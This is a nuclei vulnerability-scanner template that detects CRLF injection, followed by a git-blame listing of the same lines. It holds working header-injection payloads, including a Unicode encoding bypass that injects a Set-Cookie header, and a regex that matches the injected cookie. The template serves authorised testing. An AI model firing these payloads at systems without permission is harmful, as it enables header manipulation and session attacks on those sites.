nuclei-templates/vulnerabilities/crlf-injection.yaml

id: crlf-injection

info:
  name: CRLF injection
  author: nadino
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection"  # Unicode bypass
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
        part: header
CRLF injection CRLF injection with normal encoding and unicode bypass encoding https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection 2020-05-04 15:53:49 +00:00			`id: crlf-injection`

			`info:`
			`name: CRLF injection`
			`author: nadino`
			`severity: low`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"`
Update syntax 2020-05-25 08:24:39 +00:00			`- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # Unicode bypass`
CRLF injection CRLF injection with normal encoding and unicode bypass encoding https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection 2020-05-04 15:53:49 +00:00			`matchers:`
Update crlf-injection.yaml 2020-05-24 12:22:35 +00:00			`- type: regex`
			`regex:`
Handle more spacing edge-cases, anchor at end of line 2020-06-22 11:15:01 +00:00			`- '(?m)^(?:Set-Cookie\s?:(?:\s?\|.?;\s?))(crlfinjection=crlfinjection)(?:\s*?)(?:$\|;)'`
Update crlf-injection.yaml 2020-05-24 12:22:35 +00:00			`part: header`